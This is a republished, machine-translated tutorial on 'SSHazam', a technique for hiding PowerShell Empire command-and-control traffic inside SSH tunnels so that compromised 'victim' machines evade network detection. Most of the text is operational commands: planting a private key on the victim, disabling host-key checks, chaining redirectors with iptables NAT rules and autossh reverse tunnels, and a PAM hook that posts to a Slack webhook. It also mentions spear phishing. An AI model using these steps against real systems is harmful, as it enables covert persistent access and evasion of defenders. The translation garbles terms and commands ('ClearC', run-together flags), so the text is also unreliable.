Shulou(Shulou.com)06/02 Report--

It is believed that many inexperienced people are at a loss about how to hide ClearC traffic in the standard SSH tunnel. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

SHazam is a technology that hides clipping C traffic in standard SSH tunnels to avoid network detection. In the example in this article, you will run PowerShell Empire to connect to the victim's localhost port. The local port is forwarded to the remote Empire server over the SSH connection so that the only network traffic we can see is SSH. The victim system in the example is OS X, but the same technology can also be implemented on Windows using Plink.exe (part of Putty toolset).

As you can see from the figure above, the victim system has a SSH tunnel configured to listen on port 5430 and forward anything received to Empire Server. Empire Server lets Empire run and listen on the same port on its own localhost (127.0.0.1 localhost 5430). To make SSH traffic look more confusing, we asked the SSH server to listen on port 443 instead of the standard port 22. You can change its listening port by editing the SSH configuration file, as well as the cloud provider firewall configuration to allow communication through this port.

Before establishing a tunnel, you must create or copy the private key to the victim's system. The associated public key must be added to the authorized_keys file of empire-server to allow SSH connections. In this example, we place the private key file in the victim's ~ / .ssh / .do.key directory. You can do this with the following command:

Mkdir ~ / .sshchmod 700 ~ / .sshecho-BEGIN RSA PRIVATE KEY- > > ~ / .ssh/.do.keyecho MIIJKAIBAAKCAgEArVuMJdwgl9z9s1C0mrYV05hwUevmY+CkJaY/1iiPJSE6/AAp > > ~ / .ssh/.do.keyecho + qkMZ9nrHkBQtaQMrXPW5MQXLxU/o8LQ5QyPiy/B4FiGEfNSx//mSJvEYAXXN4zC > > ~ / .ssh/.do.keyecho RkiQ5Eir83CLCZFLRWV8wFvNkGV2krxMXDtHHFL5ars/J7tdBekmYI62eXnE5oXl > > ~ / .ssh/.do.keyecho NHky2x6YsnQf5lOkC1XyWvwg77gR2kRhb9KpOi+hp6xB42o00mpbZgyY5V4= > > ~ / .ssh/.do.keyecho-END RSA PRIVATE KEY- > > ~ / .ssh/.do.keychmod 6000.ssh/.do.key

To prevent anyone who has access to the private key from performing unnecessary operations on your empire-server, you can make configuration changes on the Empire Server. Edit the / etc/passwd file to change the login name to / bin/false.

Victim:x:1001:1001:Victim Guy,:/home/victim:/bin/false

Using the private key on the compromised system, a simple command can configure the SSH tunnel and port for you.

Ssh-I ~ / .ssh/.do.key-p 443-N-f-oStrictHostKeyChecking=no victim@empire-server.corp.com-L 5430

Now, you can configure PowerShell Empire or your own C2 to listen for connections on 127.0.0.1 Freund 5430. This works even when you have complex configurations such as domain domain fronting.

Just like this, all C2 traffic is hidden in an encrypted SSH tunnel, so you don't have to worry about C2 triggering any other network signatures.

This technology looks very good and simple, but I'm sure you don't want to put your customer's sensitive data on someone else's cloud. If so, you need to set up other redirectors to forward traffic through the cloud to the system in your own network. But the disadvantage of this is that the operation process will be much more complicated, but don't worry that I have solved all the problems for you, as follows:

The C2 connection is forwarded to empire-redirector through the SSH tunnel. The firewall rule on empire-redirector forwards traffic to another intermediate redirector. Finally, the internal system in which the Empire C2 session eventually logs in establishes a reverse SSH connection to the final redirector.

The SSH command that runs on the victim's computer is as follows:

Ssh-I ~ / .ssh/.do.key-p 443-N-f-oStrictHostKeyChecking=no victim@empire-redirector.corp.com-L 5430

The SSH command to run from an internal trusted system is:

Autossh-M 5431-o ServerAliveInterval=30-R 5433 root@redirector.corp.com 10.10.185 root@redirector.corp.com

You may need to install autossh first, but it's worth it because it ensures that your tunnel stays running for a long time.

The IP rules for Empire-Redirector are as follows:

Iptables-t nat-An OUTPUT-m addrtype-- src-type LOCAL-- dst-type LOCAL-p tcp-m multiport-- dports 5430 addrtype 65535-j DNAT-- to-destination 128.62.137.184:5432iptables-t nat-A POSTROUTING-m addrtype-- src-type LOCAL-- dst-type UNICAST-j MASQUERADEsysctl-w net.ipv4.conf.all.route_localnet=1

This forwards ports 5430 to 65535 to the final redirector, and you can use any port in the range to connect to the victim.

The IP table rules for the redirector are as follows:

Sysctl-w net.ipv4.conf.all.route_localnet=1iptables-t nat-I PREROUTING-p tcp-- dport 5432-j DNAT-- to 127.0.0.1

You may also want to be notified through slack when establishing a SSH connection. Just add these two lines to the / etc/pam.d/sshd file on empire-redirector so that my slack notification script runs automatically each time a SSH connection is successfully established.

Session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so opensession optional pam_exec.so / home/root/ssh-slack-alert.sh

Here's what's in my slack script:

#! / usr/bin/env bashif ["$PAM_USER"! = "admin"] & & [$PAM_TYPE! = "close_session"] thenmessage= "\ `PamType: $PAM_TYPE\ nSSH-User: $PAM_USER\ nRhost: $PAM_RHOST\ nServer: SSHazam\ nHostname: `hostname`\ `" curl-X POST\-- data-urlencode "payload= {\" channel\ ":\" alerts\ ",\" username\ ":\" SSHazam\ " \ "text\":\ "${message}\",\ "icon_emoji\":\ ": boom:\"} "\ https://hooks.slack.com/services/YOUR/SLACK/HOOKHEREfi

Be careful! In this more complex scenario, only one victim can connect at a time unless each victim is configured to use a different port and user / private key combination on empire-redirector. It's annoying, but it works pretty well in spear fishing scenes.

After reading the above, have you learned how to hide ClipC traffic in a standard SSH tunnel? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.